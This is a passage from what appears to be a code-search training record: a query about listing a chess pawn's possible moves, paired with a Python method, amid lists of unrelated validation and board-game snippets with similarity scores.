fin.read()\n\n # Check cols and splits strings\n\n bad_names = []\n line_numbers = []\n\n strs = [\"cols\", \"splits\", \"divs\"]\n\n for tstr in strs:\n\n start = content.find(tstr)\n\n while start != -1:\n\n cols_str = \"\".join(content[start:].split(\"\\n\")[0].split(\"=\")[-1].split(\" \"))\n\n semis = cols_str.count(\";\")\n\n # Get line number\n line_end = content.find(\"\\n\", start)\n line_number = content[:line_end].count(\"\\n\") + 1\n\n if tstr == \"divs\":\n colons = cols_str.count(\",\")\n else:\n colons = cols_str.count(\":\")\n\n if colons != (semis + 1):\n bad_names.append(tstr)\n line_numbers.append(line_number)\n\n start = content.find(tstr, start + 1)\n\n return bad_names, line_numbers", "def find_three_in_row(self, row):\n\n if row[0] != ' ' and row[0] == row[1] and row[1] == row[2]:\n return True\n else:\n return False", "def valid(self, col, rank):\n return rank <= 8 and rank > 0 and self.getColIdx(col) < 8 and self.getColIdx(col) >= 0", "def valid(self, col, rank):\n return rank <= 8 and rank > 0 and self.getColIdx(col) < 8 and self.getColIdx(col) >= 0", "def human_go(self, board):\r\n coord_pattern = re.compile(\r\n \"[0-{}],[0-{}]\".format(board.shape[0], board.shape[1])\r\n )\r\n print(\"Enter Coordinates of your go then press enter.\")\r\n input_str = input(\"(space seperated, 0-2 with origin in top left)\\n\")\r\n\r\n if not coord_pattern.match(input_str):\r\n print(\"That is not in the right format, please try again...\")\r\n return self.human_go(board)\r\n else:\r\n y, x = [int(coord) for coord in input_str.split(\",\")]\r\n if board[x][y] != 0:\r\n print(\"That square is already taken, please try again\")\r\n self.human_go()\r\n else:\r\n board[x][y] = -1\r\n return board", "def is_valid_matrix_server_name(string: str) -> bool:\n\n try:\n host, port = parse_server_name(string)\n except ValueError:\n return False\n\n valid_ipv4_addr = isIPAddress(host)\n valid_ipv6_literal = (\n host[0] == \"[\" and host[-1] == \"]\" and isIPv6Address(host[1:-1])\n )\n\n return valid_ipv4_addr or valid_ipv6_literal or is_valid_hostname(host)", "def _validate_data_format(data_format):\n data_format_ = str(data_format).upper()\n if data_format_ in {'NHWC', 'NCHW'}:\n return data_format_\n raise ValueError(\n 'Argument data_format=\"{}\" not recognized; must be one of '\n '{{\"NHWC\", \"NCHW\"}} (case insensitive).'.format(data_format))", "def check_rows(self):\r\n for i in range(0, len(self.grid),3):\r\n if self.grid[i][-1] != ' ' and self.grid[i][-1] == self.grid[i+1][-1] and self.grid[i+1][-1] == self.grid[i+2][-1]:\r\n return (i, (self.grid[i], self.grid[i+2]))\r\n return (-1, None)", "def check_valid_csv_data(self, row):\n obj = re.match(re.compile('^[0-9]{4}\\,[A-Z]{1}[a-z]{2}\\,.'),\n ','.join(row))\n if not obj:\n raise Exception(\"Invalid Data String must be like `1990` `Jan` Check Sample file\")", "def test_row_col(board, rows):\n for i in range(len(board)):\n cur_player = board[i][0] if rows else board[0][i]\n in_a_row = 0\n for j in range(len(board)):\n symbol = board[i][j] if rows else board[j][i]\n if (not symbol == '-') and (symbol == cur_player):\n in_a_row += 1\n else:\n break\n winner = who_won(in_a_row, len(board), cur_player)\n if not winner == 0:\n return winner\n return 0", "def is_valid(columns, row, col):\n # `row` is the current row; check against all previous rows\n for r in range(row):\n c = columns[r]\n # Check column\n if c == col:\n return False\n # Check diagonal\n if abs(c - col) == row - r:\n return False\n return True", "def valid_format(s):\n if len(s) > 7:\n return False\n elif '0' in s and len(s) == 1:\n return True\n elif s[0] == '0' and len(s) > 1:\n return False\n elif introcs.isalpha(s):\n return False\n elif (len(s) > 3) and (introcs.count_str(s, ',') == 0):\n return False\n elif introcs.count_str(s, ',') == 0:\n return introcs.isdecimal(s)\n elif introcs.count_str(s, ',') > 1:\n return False\n elif ',' in s and introcs.count_str(s,',') == 1:\n comma_check = s[introcs.find_str(s, ',')+1:]\n before_comma_check = s[:introcs.find_str(s, ',')]\n introcs.isdecimal(before_comma_check)\n return (True if len(comma_check) == 3 else False) and introcs.isdecimal(before_comma_check)", "def validate(name, bracket, bracket_side, bfr):\n\n return bfr[bracket.begin:bracket.end].islower()", "def caseStr2Int(self, c):\n\n err = (\n 'The square name must be 2 caracters i.e. e2,e4,b1...',\n 'Incorrect square name. Please enter i.e. e2,e4,b1...'\n )\n letters = ('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h')\n numbers = ('1', '2', '3', '4', '5', '6', '7', '8')\n\n if (len(c) != 2):\n print(err[0])\n return -1\n\n if (c[0] not in letters):\n print(err[1])\n return -1\n\n if (c[1] not in numbers):\n print(err[1])\n return -1\n\n return self.coord.index(c)", "def checkio(game_result: List[str]) -> str:\n # row check\n if 'XXX' in game_result:\n return \"X\"\n if 'OOO' in game_result:\n return 'O'\n # column check\n if ('X', 'X', 'X') in zip(*game_result):\n return 'X'\n if ('O', 'O', 'O') in zip(*game_result):\n return 'O'\n # diagonal check\n if game_result[0][0] == game_result[1][1] == game_result[2][2] != '.':\n return game_result[1][1]\n # anti-diagonal check\n if game_result[0][2] == game_result[1][1] == game_result[2][0] != '.':\n return game_result[1][1]\n return 'D'", "def validateFormat(barcode):\r\n validatesymbol = 0\r\n delimitedsymbol = 0\r\n if barcode[0] == '' or barcode[-1] == '':\r\n validatesymbol += 1\r\n for i in range(len(barcode)):\r\n try:\r\n int(barcode[i])\r\n except ValueError:\r\n if barcode[i] == '-':\r\n delimitedsymbol += 1\r\n else:\r\n validatesymbol += 1\r\n if delimitedsymbol == 0 and validatesymbol == 0:\r\n if len(barcode) == 12 or len(barcode) == 13:\r\n pass\r\n else:\r\n validatesymbol += 1\r\n if validatesymbol == 0:\r\n return True\r\n else:\r\n return False", "def is_valid(gr, pos, num):\n \n row = pos[0]\n col = pos[1]\n \n for i in range(0, 9):\n # test row\n if(i != col and gr[row][i] == num):\n return False\n # test col\n if(i != row and gr[i][col] == num):\n return False\n\n # test 3x3 square\n small_row = floor(row / 3) * 3\n small_col = floor(col / 3) * 3\n\n for i in range(small_row, small_row + 3):\n for j in range(small_col, small_col + 3):\n if((i != row and j != col) and gr[i][j] == num):\n return False\n \n return True", "def isAMANDATrig(string, pos):\n return string == 0 and pos == 92", "def validateBed12(df):\n try:\n msg = ''\n if df.isnull().values.any() == True: \n msg = 'Missing values' + '\\n' + str(df.isnull().sum())\n return [False, msg]\n if (all(x in ['+', '-'] for x in df['strand'].cat.categories.tolist())) != True:\n msg = 'Bad strand symbol(has to be + or -'\n return [False, msg]\n if all(y.isdigit() for z in df['blockSizes'].map(lambda x: x.split(',')[:-1]).tolist()[0] for y in z ) == False:\n msg = 'Column blockSizes contains non int values'\n return [False, msg] \n if all(y.isdigit() for z in df['blockStarts'].map(lambda x: x.split(',')[:-1]).tolist()[0] for y in z ) == False:\n msg = 'Column blockStarts contains non int values'\n return [False, msg]\n return [True, msg]\n except (TypeError, AttributeError, KeyError):\n return [False, 'Not a valid dataframe']", "def test_standardize_xyz_string(self):\n xyz = \"\"\"\n \n \n C -0.67567701 1.18507660 0.04672449\n H -0.25592948 1.62415961 0.92757746\n H -2.26870864 1.38030564 0.05865317\n O -0.36671999 -0.21081064 0.01630374\n H -0.73553821 -0.63718986 0.79332805\n C -0.08400571 1.86907236 -1.19973252\n \n H -0.50375517 1.42998100 -2.08057962\n H -0.31518819 2.91354759 -1.17697025\n H 0.97802159 1.73893214 -1.20769117\n O -3.69788377 1.55609096 0.07050345\n O -4.28667752 0.37487691 0.04916102\n H -4.01978712 -0.12970163 0.82103635\n \n \"\"\"\n expected_xyz = \"\"\"C -0.67567701 1.18507660 0.04672449\nH -0.25592948 1.62415961 0.92757746\nH -2.26870864 1.38030564 0.05865317\nO -0.36671999 -0.21081064 0.01630374\nH -0.73553821 -0.63718986 0.79332805\nC -0.08400571 1.86907236 -1.19973252\nH -0.50375517 1.42998100 -2.08057962\nH -0.31518819 2.91354759 -1.17697025\nH 0.97802159 1.73893214 -1.20769117\nO -3.69788377 1.55609096 0.07050345\nO -4.28667752 0.37487691 0.04916102\nH -4.01978712 -0.12970163 0.82103635\"\"\"\n new_xyz = converter.standardize_xyz_string(xyz)\n self.assertEqual(new_xyz, converter.standardize_xyz_string(expected_xyz))", "def check_string( pname, use ):\n for l in pname:\n if l in string.letters: continue\n if l in string.digits : continue\n if l =='_' : continue\n print( \"your \"+use+\" (\" + pname + \") contains invalid characters, please choose another one!\" )\n return False\n return True", "def parse_test_case(text):\n rows = [list(item) for item in text.split('\\n')]\n columns = [[], [], [], []]\n diagonals = [[], []]\n for i in range(4):\n for j in range(4):\n columns[j].append(rows[i][j])\n if i == j:\n diagonals[0].append(rows[i][j])\n if (i, j) in [(0, 3), (1, 2), (2, 1), (3, 0)]:\n diagonals[1].append(rows[i][j])\n return rows + columns + diagonals", "def validateWithDocString(self, x):\n up = 0\n sp = 0\n numb = 0\n ints = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]\n special = string.punctuation\n if type(x) is str:\n if len(x) >= 8:\n for i in x:\n if i.isupper():\n up += 1\n if i in special:\n sp += 1\n if i in ints:\n numb += 1\n if up >= 1 and sp >= 1 and numb >= 1:\n return True\n else:\n return False\n else:\n return False\n else:\n raise TypeError(\"Error\")", "def can_add_to(self, col):\n if col < 0 or col >= self.width:\n return False\n else :\n for r in range(self.height):\n if self.slots[r][col] == ' ':\n return True\n return False", "def _get_row_fow_letter(cls, letter):\n row_map = {\n 'A': 1, 'B': 2, 'C': 3, 'D': 4, 'E': 5,\n 'F': 6, 'G': 7, 'H': 8, 'I': 9, 'J': 10,\n }\n try:\n return row_map[letter]\n except KeyError:\n raise ValueError('The letter of the row must '\n 'be between A to J uppercase')", "def find_matches(word, string_grid, separator='\\n'):\n word_len = len(word)\n if isinstance(string_grid, list):\n matrix = string_grid\n else:\n matrix = matrixify(string_grid, separator)\n row_length, column_length = len(matrix), len(matrix[0])\n base_matches = find_base_match(word[0], matrix)\n\n if column_length < word_len > row_length or not base_matches:\n return []\n elif word_len == 1:\n return base_matches\n\n return complete_match(word, matrix, base_matches, word_len, row_length, column_length)", "def check_if_a_choice(string):\n if string[0].isupper() and string[1] == \".\" \\\n and (string[2] == ' ' or string[2] == '\\t'):\n return True\n else:\n return False", "def is_solved(bd):\n \"\"\" CONSTRAINT: Assumes board is valid\"\"\"\n count = 0\n for pos in bd:\n if pos == \" \":\n count += 1\n else:\n continue\n if count > 0:\n return False\n else:\n return True", "def validate_image_col_row(image, col, row):\n SPLIT_LIMIT = 99\n\n try:\n col = int(col)\n row = int(row)\n except BaseException:\n raise ValueError(\"columns and rows values could not be cast to integer.\")\n\n if col < 1 or row < 1 or col > SPLIT_LIMIT or row > SPLIT_LIMIT:\n raise ValueError(\n f\"Number of columns and rows must be between 1 and\"\n f\"{SPLIT_LIMIT} (you asked for rows: {row} and col: {col}).\"\n )\n if col == 1 and row == 1:\n raise ValueError(\"There is nothing to divide. You asked for the entire image.\")", "def TestColumn(SudokuGrid):\r\n for i in range(9):\r\n for j in range(8):\r\n for k in range(j+1,9):\r\n if SudokuGrid[j][i]==SudokuGrid[k][i]:\r\n return False\r\n return True", "def test_extract_column_zero_and_one_correct_content():\n data = \"\"\"kylebarnes@hotmail.com,Records manager\njoe70@yahoo.com,Network engineer\ntorresjames@white.info,Electrical engineer\nshawkins@watson.com,Science writer\"\"\"\n result = extract.extract_data_given_column(data, 0)\n assert \"shawkins@watson.com\" in result\n result = extract.extract_data_given_column(data, 1)\n assert \"Records manager\" in result", "def check_header_chars(header,\r\n warnings,\r\n allowed_chars_header='_' + digits + letters):\r\n\r\n for curr_elem in range(len(header)):\r\n for curr_char in header[curr_elem]:\r\n if curr_char not in allowed_chars_header:\r\n warnings.append('Found invalid character in %s ' %\r\n header[curr_elem] + 'header field.\\t%d,%d' % (0, curr_elem))\r\n break\r\n\r\n return warnings", "def _is_valid_keyspace_name(self, keyspace_name):\n if keyspace_name == None or not keyspace_name:\n return False\n return re.match(r\"^[a-z_]*[^-]$\", keyspace_name)", "def in_col(n: int, row: int, col: int, grid: List) -> bool:\n for x in range(9):\n if x!= row and n == grid[x][col]:\n return True\n return False", "def is_uppercase(character):\n return 'A' <= character <= 'Z'", "def isRecordNameValid(record):\n # Split the string with the record separator ':'\n splitted = record.split(':')\n # There must be 5 values - year:month:day:hour:minute\n if len(splitted) != 5:\n # Not valid - more or less than 5 values\n return False\n # There are 5 values - check each one if is a number\n for x in splitted:\n # If one of the values is not a number - record is not valid\n if not isNumber(x):\n return False\n # The record is valid\n return True", "def must_be_alphanumeric_space_period(cell):\n # Check if it's nan first\n if check_empty(cell):\n return True\n # If it's not nan, check it's a number\n return not bool(re.match(r\"^[a-zA-Z .0-9]+$\", str(cell)))" ]
[ "0.62249833", "0.6188426", "0.6152934", "0.59214056", "0.58721745", "0.5853586", "0.5825021", "0.5805107", "0.5749606", "0.57305473", "0.5700164", "0.5682207", "0.565165", "0.5625806", "0.55352753", "0.55241305", "0.5514427", "0.54875064", "0.5479798", "0.5474993", "0.5458025", "0.5434253", "0.5431049", "0.54138136", "0.53975326", "0.53720367", "0.5331805", "0.5327355", "0.5312943", "0.53053916", "0.53028005", "0.5299787", "0.52969587", "0.52752787", "0.5267957", "0.5259174", "0.5247873", "0.52464575", "0.5244636", "0.52367663", "0.5236533", "0.52293473", "0.5228349", "0.52273685", "0.5226504", "0.5210539", "0.5199466", "0.5193292", "0.5191275", "0.51801693", "0.51647407", "0.51523596", "0.51450515", "0.514183", "0.5126887", "0.5120704", "0.5114463", "0.51042515", "0.5086551", "0.50830203", "0.5065931", "0.50541514", "0.5053617", "0.5048418", "0.5045615", "0.5039746", "0.5039746", "0.5034349", "0.5032968", "0.50297713", "0.502823", "0.50269794", "0.50180286", "0.5012159", "0.501134", "0.500777", "0.5007363", "0.5002029", "0.49986285", "0.49916333", "0.4989316", "0.49738058", "0.49732995", "0.49650154", "0.4964772", "0.49633878", "0.4962328", "0.4961499", "0.49481004", "0.4944057", "0.49425256", "0.49407333", "0.4934924", "0.49310622", "0.49306706", "0.49286562", "0.49280643", "0.49258575", "0.4918591", "0.49128827" ]
0.5664392
12
Returns a string of the possible moves a pawn can make
def suggestMoves(self, startLoc, moves, hasCapture): suggest = "" for move in moves[startLoc]: if hasCapture: if moves[startLoc][move] == "capture": suggest += chr(move[1] + 97) + str(self.board.size - move[0]) + " " else: suggest += chr(move[1] + 97) + str(self.board.size - move[0]) + " " return suggest
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def legal_moves():\n\tlegal_moves = (\"r\", \"p\", \"s\")\n\treturn legal_moves", "def legal_moves(self):\n moves = \"\"\n swappable = self.swappable_positions\n empty_position = self.get_position(0)\n\n for s in swappable:\n pos_diff = empty_position[0] - s[0], empty_position[1] - s[1]\n if pos_diff[0] > 0:\n moves += \"U\"\n elif pos_diff[0] < 0:\n moves += \"D\"\n elif pos_diff[1] > 0:\n moves += \"L\"\n elif pos_diff[1] < 0:\n moves += \"R\"\n\n return moves", "def legalMoves(self):\n moves = []\n indexOfZero = self.tiles.index(0)\n \n if indexOfZero == 0:\n moves.append('Down')\n moves.append('Right')\n elif indexOfZero == 1:\n moves.append('Down')\n moves.append('Left')\n moves.append('Right')\n elif indexOfZero == 2:\n moves.append('Down')\n moves.append('Left')\n elif indexOfZero == 3:\n moves.append('Up')\n moves.append('Down')\n moves.append('Right')\n elif indexOfZero == 4:\n moves.append('Up')\n moves.append('Down')\n moves.append('Left')\n moves.append('Right')\n elif indexOfZero == 5:\n moves.append('Up')\n moves.append('Down')\n moves.append('Left')\n elif indexOfZero == 6:\n moves.append('Up')\n moves.append('Right')\n elif indexOfZero == 7:\n moves.append('Up')\n moves.append('Left')\n moves.append('Right')\n elif indexOfZero == 8:\n moves.append('Up')\n moves.append('Left')\n else:\n print('something wrong with board')\n return moves", "def get_available_moves(self):\n available = []\n row, col = tuple(self.current_pos)\n if row - 1 >= 0 and self.maze[row - 1][col] != 'x':\n available.append('n')\n if row + 1 < len(self.maze) and self.maze[row + 1][col] != 'x':\n available.append('s')\n if col - 1 >= 0 and self.maze[row][col - 1] != 'x':\n available.append('w')\n if col + 1 < len(self.maze[row]) and self.maze[row][col + 1] != 'x':\n available.append('e')\n return available", "def show_possible_moves():\n print(\"Possible moves:\")\n print(\"\\t\\\\sw - Moves a card from Stock to Waste.\")\n print(\"\\t\\\\wf <suit> - Moves a card from Waste to the <suit> Foundation. Suit must be one of: \"\n \"clubs/diamonds/hearts/spades.\")\n print(\"\\t\\\\wt <tableau_num> - Moves a card from Waste to the <tableau_num> Tableau. <tableau_num> must be \"\n \"between 1 and 7, inclusive. \")\n print(\"\\t\\\\tf <tableau_num> <suit> - Moves a card from the <tableau_num> Tableau to the <suit> foundation. \"\n \"Same input rules as above. \")\n print(\"\\t\\\\tt <num_1> <num_2> - Moves all face-up cards from <num_1> Tableau to <num_2> Tableau. Same input \"\n \"rules as above. \")\n print(\"\\t\\\\help - Displays all possible moves. \")\n print(\"\\t\\\\quit - Quit the game.\\n\")", "def get_all_possible_moves():\r\n \"\"\"\r\n Creates the labels for the universal chess interface into an array and returns them\r\n \"\"\"\r\n labels_array = []\r\n letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h']\r\n numbers = ['1', '2', '3', '4', '5', '6', '7', '8']\r\n promoted_to = ['q', 'r', 'b', 'n']\r\n\r\n for l1 in range(8):\r\n for n1 in range(8):\r\n destinations = [(t, n1) for t in range(8)] + \\\r\n [(l1, t) for t in range(8)] + \\\r\n [(l1 + t, n1 + t) for t in range(-7, 8)] + \\\r\n [(l1 + t, n1 - t) for t in range(-7, 8)] + \\\r\n [(l1 + a, n1 + b) for (a, b) in\r\n [(-2, -1), (-1, -2), (-2, 1), (1, -2), (2, -1), (-1, 2), (2, 1), (1, 2)]]\r\n for (l2, n2) in destinations:\r\n if (l1, n1) != (l2, n2) and l2 in range(8) and n2 in range(8):\r\n move = letters[l1] + numbers[n1] + letters[l2] + numbers[n2]\r\n labels_array.append(move)\r\n for l1 in range(8):\r\n l = letters[l1]\r\n for p in promoted_to:\r\n labels_array.append(l + '2' + l + '1' + p)\r\n labels_array.append(l + '7' + l + '8' + p)\r\n if l1 > 0:\r\n l_l = letters[l1 - 1]\r\n labels_array.append(l + '2' + l_l + '1' + p)\r\n labels_array.append(l + '7' + l_l + '8' + p)\r\n if l1 < 7:\r\n l_r = letters[l1 + 1]\r\n labels_array.append(l + '2' + l_r + '1' + p)\r\n labels_array.append(l + '7' + l_r + '8' + p)\r\n return labels_array", "def generate_possible_moves(self):\r\n\t\t# Moves:\r\n\t\t# 0 - North\r\n\t\t# 1 - East\r\n\t\t# 2 - South\r\n\t\t# 3 - West\r\n\r\n\t\tmoves = []\r\n\r\n\t\tif self.x != 0:\r\n\t\t\tmoves.append(0)\r\n\t\tif self.y != self.n-1:\r\n\t\t\tmoves.append(1)\r\n\t\tif self.x != self.n-1:\r\n\t\t\tmoves.append(2)\r\n\t\tif self.y != 0:\r\n\t\t\tmoves.append(3)\r\n\r\n\t\treturn moves", "def get_possible_moves(self) -> list:\n if self.p1_turn:\n name = '2'\n else:\n name = '1'\n\n count = 0\n for i in self.claim:\n if i == name:\n count += 1\n over = count >= 0.5 * len(self.claim)\n\n moves = []\n if not over:\n for i in self.letters:\n if i.isalpha():\n moves.append(i)\n return moves", "def get_valid_moves(x, y, path):\n \n valids = \"\"\n \n # First compute the hash\n digest = md5(passcode + path).hexdigest()\n \n # Check Up\n if y != 0 and digest[0] in \"bcdef\":\n valids += 'U'\n \n # Check Down\n if y != 3 and digest[1] in \"bcdef\":\n valids += 'D'\n \n # Check Left\n if x != 0 and digest[2] in \"bcdef\":\n valids += 'L'\n \n # Check Right\n if x != 3 and digest[3] in \"bcdef\":\n valids += 'R'\n \n return valids", "def legal_moves():\n i = 0\n moves = []\n for column in STATE[0]:\n if column == '-':\n moves.append(i)\n i += 1\n return moves", "def get_possible_moves(self) -> list:\n p1_count = 0\n p2_count = 0\n ley_line_total = (self.side_length + 1) * 3\n for itype in self.current_ley_lines:\n for line in itype:\n if line[0] == '1':\n p1_count += 1\n if line[0] == '2':\n p2_count += 1\n if p1_count >= ley_line_total / 2 or p2_count >= ley_line_total / 2:\n return []\n moves = []\n for letter in self.current_board:\n if letter.isalpha():\n moves.append(letter)\n return moves", "def get_pawn_moves(self, state):\n pawn_moves = []\n\n if self.color == cc.WHITE_ACTIVE:\n forward_1 = add_vectors(self.coord, cc.V_UP)\n forward_2 = add_vectors(self.coord, cc.V_UP_2)\n attacks = get_crawler_moves(self.coord, cc.W_PAWN_CAPTURE_VECTORS)\n starting_rank = cc.RANK_2\n promo_rank = cc.RANK_8\n promo_pieces = cc.WHITE_PROMO\n enemy_set = cc.BLACK_PIECES\n elif self.color == cc.BLACK_ACTIVE:\n forward_1 = add_vectors(self.coord, cc.V_DOWN)\n forward_2 = add_vectors(self.coord, cc.V_DOWN_2)\n attacks = get_crawler_moves(self.coord, cc.B_PAWN_CAPTURE_VECTORS)\n starting_rank = cc.RANK_7\n promo_rank = cc.RANK_1\n promo_pieces = cc.BLACK_PROMO\n enemy_set = cc.WHITE_PIECES\n else:\n raise Exception(\"get_pawn_moves: Invalid Piece Color\")\n\n if validate_move(forward_1) and state.board[forward_1] == cc.NO_PIECE:\n if forward_1[0] == promo_rank:\n for p in promo_pieces:\n pawn_moves.append(cc.Action(self.string, self.coord, forward_1, promo=p))\n else:\n pawn_moves.append(cc.Action(self.string, self.coord, forward_1))\n if self.coord[0] == starting_rank and validate_move(forward_2) and state.board[forward_2] == cc.NO_PIECE:\n pawn_moves.append(cc.Action(self.string, self.coord, forward_2, en_p=forward_1))\n\n for attack in attacks:\n if state.board[attack] in enemy_set:\n if attack[0] == promo_rank:\n for p in promo_pieces:\n pawn_moves.append(cc.Action(self.string, self.coord, attack, capture=True, promo=p))\n else:\n pawn_moves.append(cc.Action(self.string, self.coord, attack, capture=True))\n # Make sure Pawns can attack en_passant squares\n elif attack == state.en_passant:\n pawn_moves.append(cc.Action(self.string, self.coord, attack, capture=True))\n\n return pawn_moves", "def get_moves(character):\n if character == 'player':\n x_coord = get_locations()['player'][0]\n y_coord = get_locations()['player'][1]\n elif character == 'monster':\n x_coord = get_locations()['monster'][0]\n y_coord = get_locations()['monster'][1]\n if x_coord == 1 and y_coord == 1:\n return ['S', 'D']\n elif x_coord == STATUS['grid_size'] and y_coord == STATUS['grid_size']:\n return ['W', 'A']\n elif x_coord == 1 and y_coord == STATUS['grid_size']:\n return ['W', 'D']\n elif x_coord == STATUS['grid_size'] and y_coord == 1:\n return ['S', 'A']\n elif x_coord == 1:\n return ['W', 'D', 'S']\n elif y_coord == 1:\n return ['D', 'S', 'A']\n elif x_coord == STATUS['grid_size']:\n return ['W', 'S', 'A']\n elif y_coord == STATUS['grid_size']:\n return ['W', 'A', 'D']\n else:\n return ['W', 'D', 'S', 'A']", "def possible(state_board,turn):\n\tlegal_moves = [] # list of legal moves as Move objects\n\tfor i in range(1,9):\n\t\tfor j in range(1,9):\n\t\t\tif state_board[i][j] == 0:\n\t\t\t\tif flipper([i,j],turn,state_board) != []:\n\t\t\t\t\t# if there are flipped pieces, it appends this move to\n\t\t\t\t\t# the legal moves and draws it in light greens\n\t\t\t\t\tlegal_moves.append((i,j))\n\t\t\t\t\tdrawPiece((i,j),3)\n\t\t\t\telse:\n\t\t\t\t\t# if it is 0 and is not legal, make sure it is of bgcolor\n\t\t\t\t\tdrawPiece((i,j),0)\n\t\n\treturn legal_moves", "def possibleMoves(self,i,j):\n piece = self.board[i][j].piece\n if(piece.pieceCode == \"None\"):\n return []\n \n if(piece.name == \"pawn\"):\n return self.pawnMoves(piece,self.board)\n elif(piece.name == \"king\"):\n return self.kingSteps(self.board,piece.color)\n else:\n return self.pieceMoves(piece,self.board)", "def get_pawn_moves(self, i, j, moves):\r\n # white pawn\r\n if self.turn_white:\r\n # one&two squares moves\r\n if self.board[i - 1][j] == \"--\":\r\n moves.append(Move((i, j), (i - 1, j), self.board))\r\n if i == 6 and self.board[i - 2][j] == \"--\":\r\n moves.append(Move((i, j), (i - 2, j), self.board))\r\n # capturing\r\n # left\r\n if j >= 1:\r\n if self.board[i - 1][j - 1][0] == \"b\":\r\n moves.append(Move((i, j), (i - 1, j - 1), self.board))\r\n elif (i - 1, j - 1) == self.enpas_pos:\r\n moves.append(Move((i, j), (i - 1, j - 1), self.board, enpassant=True))\r\n\r\n # right\r\n if j <= 6:\r\n if self.board[i - 1][j + 1][0] == \"b\":\r\n moves.append(Move((i, j), (i - 1, j + 1), self.board))\r\n elif (i - 1, j + 1) == self.enpas_pos:\r\n moves.append(Move((i, j), (i - 1, j + 1), self.board, enpassant=True))\r\n # black\r\n else:\r\n # one&two squares moves\r\n if self.board[i + 1][j] == \"--\":\r\n moves.append(Move((i, j), (i + 1, j), self.board))\r\n if i == 1 and self.board[i + 2][j] == \"--\":\r\n moves.append(Move((i, j), (i + 2, j), self.board))\r\n # capturing\r\n # left\r\n if j >= 1:\r\n if self.board[i + 1][j - 1][0] == \"w\":\r\n moves.append(Move((i, j), (i + 1, j - 1), self.board))\r\n elif (i + 1, j - 1) == self.enpas_pos:\r\n moves.append(Move((i, j), (i + 1, j - 1), self.board, enpassant=True))\r\n # right\r\n if j <= 6:\r\n if self.board[i + 1][j + 1][0] == \"w\":\r\n moves.append(Move((i, j), (i + 1, j + 1), self.board))\r\n elif (i + 1, j + 1) == self.enpas_pos:\r\n moves.append(Move((i, j), (i + 1, j + 1), self.board, enpassant=True))", "def possible_moves(self): \n return [a + 1 for a, b in enumerate(self.board) if b == 0]", "def get_moves(self):", "def get_possible_moves(board):\n\n possible_moves = []\n\n ret_tuple_left = move_left(board)\n ret_tuple_right = move_right(board)\n ret_tuple_up = move_up(board)\n ret_tuple_down = move_down(board)\n\n if ret_tuple_left[0]:\n possible_moves.append(ret_tuple_left[1])\n if ret_tuple_right[0]:\n possible_moves.append(ret_tuple_right[1])\n if ret_tuple_up[0]:\n possible_moves.append(ret_tuple_up[1])\n if ret_tuple_down[0]:\n possible_moves.append(ret_tuple_down[1])\n\n return possible_moves", "def actions(self, state):\n\n actions = []\n \n # if its player 1's turn\n if state.maxs_turn==True:\n # look through all the squares on the board\n for coords in state.gameState:\n # if its a rebel append allowable move and attack actions\n if state.gameState[coords]=='R':\n if state.gameState[(coords[0]-1, coords[1])]== ' ':\n actions.append(\"Move: Rebel @ {} --> {}\".format(coords, (coords[0]-1, coords[1])))\n if ((coords[0]-1, coords[1]+1) in state.gameState) and (state.gameState[(coords[0]-1, coords[1]+1)]== 'S'):\n actions.append(\"Attack: Rebel @ {} --> Sith @ {}\".format(coords, (coords[0]-1, coords[1]+1)))\n if ((coords[0]-1, coords[1]-1) in state.gameState) and (state.gameState[(coords[0]-1, coords[1]-1)]== 'S'):\n actions.append(\"Attack: Rebel @ {} --> Sith @ {}\".format(coords, (coords[0]-1, coords[1]-1)))\n \n # if its a jedi append allowable move and attack actions\n elif state.gameState[coords]=='J':\n for direction in [(-1, 0),(-1,1),(0,1),(1,1),(1,0),(1,-1),(0,-1),(-1,-1)]:\n coord = (coords[0]+direction[0], coords[1]+direction[1])\n # walk in each direction until reaching the edge of board, or a player\n while (coord in state.gameState) and (state.gameState[coord] == ' '):\n actions.append(\"Move: Jedi @ {} --> {}\".format(coords, coord))\n coord = (coord[0]+direction[0], coord[1]+direction[1])\n # if we ran into a sith we can attack\n if (coord in state.gameState) and (state.gameState[coord] == 'S'):\n actions.append(\"Attack: Jedi @ {} --> Sith @ {}\".format(coords, coord))\n \n else:\n for coords in state.gameState:\n if state.gameState[coords]=='S':\n for direction in [(-1, 0),(-1,1),(0,1),(1,1),(1,0),(1,-1),(0,-1),(-1,-1)]:\n coord = (coords[0]+direction[0], coords[1]+direction[1])\n if (coord in state.gameState) and (state.gameState[coord] == ' '):\n actions.append(\"Move: Sith @ {} --> {}\".format(coords, coord))\n elif (coord in state.gameState) and (state.gameState[coord] == 'R'):\n actions.append(\"Attack: Sith @ {} --> Rebel @ {}\".format(coords, coord))\n elif (coord in state.gameState) and (state.gameState[coord] == 'J'):\n actions.append(\"Attack: Sith @ {} --> Jedi @ {}\".format(coords, coord))\n \n\n\n if len(actions)==0:\n actions.append(\"Pass\")\n \n actions.sort()\n \n return actions", "def get_instructions(self) -> str:\n instructions = \"Players take turns to occupy available positions \" \\\n \"on the \" \\\n \"board. Once half or more of a ley-line has been \" \\\n \"occupied\" \\\n \"one player, that ley-line is entirely captured by \" \\\n \"said player. The winner is the person who captures \" \\\n \"half\" \\\n \"or more of the ley-lines first.\"\n return instructions", "def possible_moves(self, piece):\n def _index(orig, off):\n \"\"\"Helper function to find the new index.\"\"\"\n orig_x, orig_y = orig\n off_x, off_y = off\n return (orig_y - off_y) * self.ncols + (orig_x - off_x)\n\n p_x, p_y = piece\n p_i = _index(piece, (0, 0))\n\n # pass a list of the four corners first for basic possibles\n move_land = [((p_x + i, p_y + j), self.squares[_index(piece, (i, j))])\\\n for i in [-1, 1] for j in [-1, 1]]\n possibles = self.squares[p_i].can_move(piece, move_land)\n\n # next append the new list from jumps\n jump_land = [((p_x + i, p_y + j), self.squares[_index(piece, (i, j))])\\\n for j in [-2, 2] for i in [-2, 2]]\n possibles += self.squares[p_i].can_jump(piece, move_land, jump_land)\n\n # clean out the list of duplicates, although there should be none\n return [m for i, m in enumerate(possibles) if m not in possibles[:i]]", "def get_legal_moves(self):\n # for each square in the castle figure out if an moves can occur from it.\n moves = []\n allowed = [self.turn]\n if self.turn == DEFENDER:\n allowed.extend((KING, CASTLE_OCCUPIED))\n it = np.nditer(self.board_state, flags=['multi_index'])\n while not it.finished:\n index = it.multi_index\n curr_loc = it[0]\n if curr_loc in 